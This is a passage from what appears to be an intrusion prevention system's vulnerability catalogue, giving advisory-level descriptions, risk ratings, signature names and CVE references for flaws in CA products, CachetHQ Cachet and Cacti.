A directory traversal vulnerability exists in CA ERwin Web Portal. This vulnerability is due to lack of authentication and insufficient input validation in the FileAccessServiceProvider servlet when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to delete arbitrary files recursively on a target system.

Situation:

HTTP_CS-CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service

References:

CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210

BID-66644
http://www.securityfocus.com/bid/66644

OSVDB-106136
http://www.osvdb.org/106136

CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure

About this vulnerability:

A vulnerability in CA Erwin Web Portal

Risk:

Moderate

First detected in:

sgpkg-ips-579-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA Erwin Web Portal

Type:

Directory Traversal

Description:

Two information disclosure vulnerabilities exist in CA ERwin Web Portal. These vulnerabilities are due to lack of authentication and insufficient input validation in the ProfileIconServlet servlet when processing multiple HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage these vulnerabilities to view the contents of arbitrary files on a target system.

Situation:

HTTP_CSU-CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure

References:

CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210

BID-66644
http://www.securityfocus.com/bid/66644

OSVDB-106137
http://www.osvdb.org/106137

CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in CA eTrust Intrusion Detection

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates eTrust Intrusion Detection

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in CA eTrust Intrusion Detection. The flaw is due to an input validation error in the administrative login functionality of the eTrust Intrusion Detection server. A remote unauthenticated attacker may leverage this vulnerability to cause a denial of service condition on the vulnerable system. The affected service will terminate after processing the malicious message, creating a denial-of-service condition. This will cause all the other active network connections to the server to be dropped and the service needs to be restarted manually to restore the functionality.

Situation:

Generic_CS-CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service

References:

CVE-2007-1005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1005

BID-22743
http://www.securityfocus.com/bid/22743

CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Computer Associates eTrust PestPatrol

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates eTrust PestPatrol

Type:

Buffer Overflow

Description:

There exists a vulnerability in Computer Associates eTrust PestPatrol ActiveX control. The vulnerability is due to an insufficient input validation when processing user supplied data. A successful exploitation may lead to code execution in the context of the current user.

Situation:

HTTP_SS-CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
File-Text_CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow

References:

CVE-2009-4225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4225

BID-37133
http://www.securityfocus.com/bid/37133

OSVDB-60862
http://www.osvdb.org/60862

CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow

About this vulnerability:

A vulnerability in CA eTrust Secure Content Manager

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates eTrust Secure Content Manager

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in CA eTrust Secure Content Manager. The vulnerability is due to insufficient bounds checking on certain FTP responses. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted FTP PASV response to the target server, potentially causing arbitrary code injection and execution with the privileges of the affected process, normally System.

Situation:

FTP_SS-CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow

References:

CVE-2008-2541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2541

BID-29528
http://www.securityfocus.com/bid/29528

CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation

About this vulnerability:

A vulnerability in CA Host-Based Intrusion Prevention System

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA Host-Based Intrusion Prevention System; CA Internet Security Suite

Type:

Malfunction

Description:

An insecure file creation vulnerability exists in CA Internet Security Suite. The vulnerability is due to an error when the XMLSecDB ActiveX control, which is installed with the HIPSEngine component, handles SetXml and Save methods. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML page. Successful exploitation could possibly allow attackers to execute arbitrary code within the context of the current user.

Situation:

HTTP_SS-CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
File-Text_CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation

References:

CVE-2011-1036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1036

BID-46539
http://www.securityfocus.com/bid/46539

CA-License-Client-PUTOLF-Request-Directory-Traversal

About this vulnerability:

Buffer overflow in CA License Client

Risk:

Moderate

First detected in:

sgpkg-ips-22-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates License

Type:

Directory Traversal

Description:

Computer Associates (CA) License Client contains a directory traversal vulnerability. A remote attacker could exploit this vulnerability to create arbitrary files on the system via .. (dot dot) style attack.

Situation:

Generic_CA-License-Client-PUTOLF-Request-Directory-Traversal

References:

CVE-2005-0583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0583

BID-12705
http://www.securityfocus.com/bid/12705

CA-License-Client-Server-Getconfig-BOF

About this vulnerability:

Buffer overflow in CA License Client and Server

Risk:

High

First detected in:

sgpkg-ips-45-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates License

Type:

Buffer Overflow

Description:

Computer Associates (CA) License Client and Server contain a buffer overflow due to insufficient bounds checking of the last parameter in the GETCONFIG request. A remote attacker could exploit this vulnerability to execute arbitrary code on the system.

Situation:

Generic_CA-License-Client-Getconfig-BOF
Generic_CA-License-Server-Getconfig-BOF

References:

CVE-2005-0581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581

BID-12705
http://www.securityfocus.com/bid/12705

CA-License-Software-GCR-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Computer Associates License software of Computer Associates products

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates License

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the Computer Associates License software of Computer Associates products. By sending a malformed GCR message to the affected service, a remote attacker can cause a DoS or compromise the vulnerable system.

Situation:

Generic_CA-License-Software-GCR-Buffer-Overflow

References:

CVE-2005-0581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581

BID-12705
http://www.securityfocus.com/bid/12705

OSVDB-14320
http://www.osvdb.org/14320

OSVDB-14321
http://www.osvdb.org/14321

CA-License-Software-Invalid-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Computer Associates License software in Computer Associates products

Risk:

High

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates License

Type:

Buffer Overflow

Description:

The Computer Associates License software in Computer Associates products has a stack buffer overflow vulnerability due to insufficient bounds checking on user-supplied values in requests with an invalid format. A remote attacker could exploit this vulnerability to execute root/system level arbitrary code on the system.

Situation:

Generic_CA-License-Software-Invalid-Command-Buffer-Overflow

References:

CVE-2005-0581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581

BID-12705
http://www.securityfocus.com/bid/12705

CA-License-Software-PUTOLF-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerablility in the Computer Associates License software of Computer Associates products

Risk:

High

First detected in:

sgpkg-ips-45-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates License

Type:

Buffer Overflow

Description:

The Computer Associates License software in Computer Associates products has a stack buffer overflow vulnerability due to insufficient bounds checking of the filename parameter and the data parameter in the PUTOLF request. A remote attacker can exploit this vulnerability to execute root/system level arbitrary code on the target system.

Situation:

Generic_CA-License-Software-PUTOLF-Buffer-Overflow

References:

CVE-2005-0582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0582

BID-12705
http://www.securityfocus.com/bid/12705

CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF

About this vulnerability:

Buffer overflow vulnerability in the Console Server shipped with multiple Computer Associates products

Risk:

High

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates Protection Suite 3; Computer Associates Anti-Spyware for the Enterprise 8; Computer Associates Anti-Virus for the Enterprise; Computer Associates Threat Manager for the Enterprise

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the Console Server shipped with multiple Computer Associates products. A successful exploitation allows an unauthenticated remote attacker to compromise the vulnerable server.

Situation:

Generic_CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF

References:

CVE-2007-2522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2522

BID-23906
http://www.securityfocus.com/bid/23906

OSVDB-34585
http://www.osvdb.org/34585

CA-Products-Discovery-Service-Buffer-Overflow

About this vulnerability:

A vulnerability in CA BrightStor ARCserve Backup

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in the Discovery Service of multiple products developed by Computer Associates. The vulnerability is due to the failure of the application in checking the length of a received Host Name string during the discovery process. An unauthenticated remote attacker may use this flaw to remotely inject and execute code on the the vulnerable system with System level privileges. In an attack case where code injection is not successful, the affected service will terminate upon processing of the malicious message. If the service is not configured to restart automatically, the services will be unavailable until the process is restarted manually. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the service process. On Windows systems, the affected service is running with SYSTEM privileges by default configuration.

Situation:

Generic_CS-CA-Products-Discovery-Service-Buffer-Overflow

References:

CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143

BID-20364
http://www.securityfocus.com/bid/20364

CA-Products-Message-Queuing-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in CA Advantage Data Transformer

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA Message Queuing

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way CA Message Queuing Server handles incoming packets. The vulnerability is due to lack of boundary protection while processing packets. A remote unauthenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service. In an attack case where code injection is not successful, the affected server will terminate.

Situation:

Generic_CS-CA-Products-Message-Queuing-Server-Buffer-Overflow

References:

CVE-2007-0060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0060

BID-25051
http://www.securityfocus.com/bid/25051

CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection

About this vulnerability:	A vulnerability in CA Total Defense Suite
Risk:	Moderate
First detected in:	sgpkg-ips-443-4219
Last changed:	sgpkg-ips-1453-5242
Platform:	Generic
Software:	CA Total Defense Suite
Type:	Input Validation
Description:	There is an SQL Injection vulnerability in CA Total Defense Suite UNC Management Console. The vulnerability is due to insufficient sanitization of the request parameters in a stored procedure. A remote unauthenticated attacker can exploit this vulnerability by sending a craft SOAP request to the target on port 34444 for HTTP and 34443 for HTTPS. Any injected SQL commands will run with DBA privileges. This vulnerability can be leveraged by a remote unauthenticated attacker to execute arbitrary code on a target system with SYSTEM privileges by the means of SQL exec function.
Situation:	File-TextId_CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection

CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection

About this vulnerability:

A vulnerability in CA Total Defense Suite

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

CA Total Defense Suite

Type:

Input Validation

Description:

A SQL Injection vulnerability exists in CA Total Defense Suite that can be reached through the remote web service call UnAssignFunctionalUsers. The vulnerability is due to insufficient handling of the request's modifiedData parameter. The stored procedure uncsp_UnassignFunctionalRoles uses this value in a dynamic SQL statement without any input validation. Any injected SQL commands will run with DBA privileges. This vulnerability can be leveraged by a remote unauthenticated attacker to execute arbitrary code on a target system with SYSTEM privileges by the means of SQL exec function.

Situation:

HTTP_CS-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
HTTP_CRL-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection

References:

CVE-2011-1653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1653

BID-47355
http://www.securityfocus.com/bid/47355

CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal

About this vulnerability:

A vulnerability in CA Unified Infrastructure Management

Risk:

Moderate

First detected in:

sgpkg-ips-822-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA Unified Infrastructure Management

Type:

Directory Traversal

Description:

Insufficient validation of request parameters causes a directory traversal vulnerability in CA Unified Infrastructure Management. A successful exploitation allows an attacker to download arbitrary files on the target server.

Situation:

HTTP_CRL-CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal

References:

CVE-2016-5803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5803

CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow

About this vulnerability:

A vulnerability in CA Unified Infrastructure Management Nimcontroller

Risk:

High

First detected in:

sgpkg-ips-1280-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nimcontroller

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in CA Unified Infrastructure Management Nimcontroller, version 7.80.3132, which allows remote attackers to execute arbitrary code by sending a crafted directory list probe.

Situation:

Generic_TCP-CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow

References:

CVE-2020-8012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8012

CA-XOsoft-Products-Xosoapapi-Buffer-Overflow

About this vulnerability:

A vulnerability in Computer Associates XOsoft products

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

CA XOsoft

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability exists in Computer Associates XOsoft products. The vulnerability is due to insufficient boundary checking when handling certain HTTP requests sent to the ws_man.exe process. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious HTTP request to a target server. In a successful attack, where arbitrary code is injected and executed on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the service.

Situation:

HTTP_CRL-CA-XOsoft-Products-Xosoapapi-Buffer-Overflow

References:

CVE-2010-1223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1223

BID-39238
http://www.securityfocus.com/bid/39238

Cabinet-Archive-File-Transfer

About this vulnerability:	Arbitary cabinet file transfer
Risk:	Low
First detected in:	sgpkg-ips-138-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Microsoft Windows Cabinet files are archives that are typically used to install and execute software on the host. Arbitrary executable file transfer across untrusted networks may expose the system to malware infection or indicate an existing infection under some conditions.
Situation:	Shared_Microsoft-Cabinet-File-Download File-Binary_Microsoft-Cabinet-Transfer

CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection

About this vulnerability:

A vulnerability in CachetHQ Cachet

Risk:

Moderate

First detected in:

sgpkg-ips-1647-5242

Last changed:

sgpkg-ips-1647-5242

Platform:

Generic

Software:

CachetHQ Cachet

Type:

Malfunction

Description:

Unsanitized user data in Twig templates causes a command injection vulnerability in CachetHQ Cachet. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection

References:

CVE-2023-43661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43661

Cacti-Color-Filter-SQLi-To-RCE

About this vulnerability:

A vulnerability in Cacti.

Risk:

High

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

A vulnerability in Cacti, versions 1.2.12 and before, which allows remote attackers to execute arbitrary code through the filter parameter to color.php, due to insufficient input validation.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Color.php-SQL-Injection

References:

CVE-2020-14295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295

Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS

About this vulnerability:

A vulnerability in Cacti Group

Risk:

Moderate

First detected in:

sgpkg-ips-1756-5242

Last changed:

sgpkg-ips-1756-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Cacti. The vulnerability is due to improper validation of the name parameter when adding/editing the automation graph and tree rules. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution on a victim's browser.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS

References:

CVE-2024-31444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31444

Cacti-Group-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection

About this vulnerability:

A vulnerability in Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1744-5242

Last changed:

sgpkg-ips-1744-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of user input used in the build_graph_object_sql_having function. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection

References:

CVE-2024-31445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31445

Cacti-Group-Cacti-Color.php-SQL-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

High

First detected in:

sgpkg-ips-1275-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Cacti. The vulnerability is due to improper sanitization of the filter request parameter in color.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL commands against the cacti database that leads to arbitrary code execution on the target server.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Color.php-SQL-Injection

References:

CVE-2020-14295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295

Cacti-Group-Cacti-Graphs.php-SQL-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1221-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Cacti. The vulnerability is due to improper validation of user supplied input in requests to graphs.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL commands against the database on the target server.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Graphs.php-SQL-Injection

References:

CVE-2019-17357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17357

Cacti-Group-Cacti-Graph_view.php-SQL-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

High

First detected in:

sgpkg-ips-1635-5242

Last changed:

sgpkg-ips-1635-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Cacti. The vulnerability is due to improper validation of user data in the graph_view.php script. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CSU-Cacti-Group-Cacti-Graph_view.php-SQL-Injection

References:

CVE-2023-39361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39361

Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Insufficient validation of a log path parameter in installer.php causes an arbitrary file write vulnerability in Cacti. A successful exploitation allows an attacker to write and potentially execute arbitrary files on the target system.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write

References:

CVE-2024-43363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43363

Cacti-Group-Cacti-Managers-SQL-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1689-5242

Last changed:

sgpkg-ips-1689-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of user data used in SQL queries in the managers.php file causes an SQL injection vulnerability in Cacti. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Managers-SQL-Injection

References:

CVE-2023-51448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51448

Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Cacti

Risk:

High

First detected in:

sgpkg-ips-1745-5242

Last changed:

sgpkg-ips-1745-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in Cacti. The vulnerability is due to insufficient validation of user data in package_import.php and the import_package() function in import.php. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary file write on the target server.

Situation:

HTTP_CS-Cacti-Group-Cacti-Package_import.php-Potential-Arbitrary-File-Write
HTTP_CS-Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write

References:

CVE-2024-25641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25641

Cacti-Group-Cacti-poller_automation.php-Command-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

High

First detected in:

sgpkg-ips-1234-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Cacti

Type:

Input Validation

Description:

There exists a vulnerability in Cacti, version 1.2.8, which allows remote attackers to execute arbitrary code through the path_boost_log parameter in poller_automation.php, due to insufficient user input validation.

Situation:

HTTP_CRL-Cacti-Group-Cacti-poller_automation.php-Command-Injection

References:

CVE-2020-7237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7237

Cacti-Group-Cacti-Remote_Agent-Command-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1543-5242

Last changed:

sgpkg-ips-1543-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

An access control weakness and insufficient validation of user data when receiving requests from Cacti pollers cause a command injection vulnerability in Cacti. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Remote_Agent-Command-Injection
HTTP_CSH-Cacti-Group-Cacti-Remote_Agent-Command-Injection

References:

CVE-2022-46169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169

Cacti-Group-Cacti-Rrdtool-Crlf-Injection

About this vulnerability:

A vulnerability in Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper input validation when using the RRDTool binary to create graphs causes a CRLF injection vulnerability in Cacti. A successful exploitation may allow an attacker to write files and execute code on the target system.

Situation:

HTTP_CRL-Cacti-Group-Cacti-Rrdtool-Crlf-Injection

References:

CVE-2025-24367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24367

Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Cacti detected

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Unix;Linux

Software:

Cacti

Type:

Input Validation

Description:

A vulnerability in Cacti, versions prior to 1.2.25 and prior to 1.3.0, which allows remote attackers to execute arbitrary code to host.php due to insufficient input validation of several parameters.

Situation:

HTTP_CRL-Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection

References:

CVE-2023-39362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

Cacti-Group-Cacti-SQL_Save-SQL-Injection

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper input validation of user supplied input when calling the sql_save function causes an SQL injection vulnerability in Cacti SQL. A successful exploit allows an attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Cacti-Group-Cacti-SQL_Save-SQL-Injection

References:

CVE-2023-39357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39357

Cacti-Group-poller_Host_Duplicate-SQL-Injection

About this vulnerability:

A vulnerability in Cacti Group

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Cacti. The vulnerability is due to insufficient validation of user data in the poller_host_duplicate function. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CRL-Cacti-Group-Cacti-poller_Host_Duplicate-SQL-Injection

References:

CVE-2023-49085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49085

Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of user input used in the template function causes an SQL injection vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146

References:

CVE-2024-54146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54146

Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of the consolesection and consolenewsection parameters causes a cross-site scripting vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting

References:

CVE-2024-43365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43365

Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1804-5242

Last changed:

sgpkg-ips-1804-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of the fileurl parameter when adding/editing external links causes a cross-site scripting vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting

References:

CVE-2024-43362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43362

Cacti-Links.php-Title-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of the title parameters when adding/editing the external links causes a cross-site scripting vulnerability in Cacti. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Cacti-Links.php-Title-Stored-Cross-Site-Scripting

References:

CVE-2024-43364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43364

Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Cacti

Type:

Input Validation

Description:

Improper validation of the path_stderrlog parameter when updating the "Poller Standard Error Log Path" setting causes a vulnerability in Cacti. A successful exploitation allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598

References:

CVE-2024-45598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45598

Cacti-Spikekill-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Cacti Group Cacti

Risk:

Moderate

First detected in:

sgpkg-ips-980-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cacti

